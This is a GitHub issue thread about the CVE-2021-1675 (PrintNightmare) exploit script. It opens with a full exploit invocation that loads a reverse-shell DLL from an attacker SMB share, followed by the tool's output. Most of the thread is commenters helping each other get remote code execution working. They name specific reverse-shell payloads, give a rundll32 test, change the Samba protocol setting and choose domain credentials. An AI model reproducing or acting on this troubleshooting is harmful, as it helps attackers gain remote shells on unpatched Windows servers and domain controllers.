CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

Published 20 hours ago verified publisher icon cube0x0

Exploit runs but no execution/ Stuck on stage 0

Open pr0t0nus3rxyz opened this issue 3 years ago • 16 comments

$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\10.10.10.155\share\meter.dll" [] Try 1... [] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL [] Executing \10.10.10.155\share\meter.dll [] Stage0: 0 [] Try 2... [] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL [] Executing \10.10.10.155\share\meter.dll [] Stage0: 0 [] Try 3... [] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL [] Executing \10.10.10.155\share\meter.dll [] Stage0: 0

Dll doesnt get executed

pr0t0nus3rxyz avatar Jul 02 '21 07:07 pr0t0nus3rxyz

windows server 2016 and windows 10 pro

pr0t0nus3rxyz avatar Jul 02 '21 07:07 pr0t0nus3rxyz

Check if your dll reverse shell do running correct: rundll32 meter.dll, Start

andreluna avatar Jul 02 '21 12:07 andreluna

same with you

WhiteHSBG avatar Jul 02 '21 15:07 WhiteHSBG

https://github.com/cube0x0/CVE-2021-1675/issues/19

BlackSnufkin avatar Jul 02 '21 16:07 BlackSnufkin

Check if your dll reverse shell do running correct: rundll32 meter.dll, Start

Yes working fine with rundll but not with RCE.

pr0t0nus3rxyz avatar Jul 03 '21 11:07 pr0t0nus3rxyz

I am having same issue. Windows Server 2019, it is a DC. The DLL is uploading , but not executing. When I try to run manually on server it executes fine.

korang avatar Jul 04 '21 02:07 korang

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

WhiteHSBG avatar Jul 04 '21 04:07 WhiteHSBG

See https://github.com/cube0x0/CVE-2021-1675/pull/25

citronneur avatar Jul 04 '21 15:07 citronneur

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

I have tried both meterpreter and shell with no execution.

korang avatar Jul 04 '21 16:07 korang

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

I have tried both meterpreter and shell with no execution.

try windows/x64/shell_reverse_tcp this payload

WhiteHSBG avatar Jul 04 '21 17:07 WhiteHSBG

See #25

How do you know what driver to use?? Or what directory path to use?

korang avatar Jul 04 '21 20:07 korang

It’s just the name of the new driver, choose one randomly!

citronneur avatar Jul 04 '21 20:07 citronneur

Previously the exploit use « 1234 » as name, choose one you want!

citronneur avatar Jul 04 '21 20:07 citronneur

Hello! I was having the same issue I think it's related to the SMB version that you are using. In my lab I had a windows server 2019 and it was using the SMB version 2, so I went to my kali's /etc/samba/smb.conf I added this line to the end of [global] : min protocol = SMB2 Then I restarted nmbd and smbd service, ran the python script and was able to open a reverse shell. Cheers!

MPereira95 avatar Jul 07 '21 09:07 MPereira95

Also created a low privilege user in my Windows server AD and used those credentials when executing the python script.

MPereira95 avatar Jul 07 '21 11:07 MPereira95

you should not use administrator users

zuchuanchengxuyuan avatar Jul 16 '21 09:07 zuchuanchengxuyuan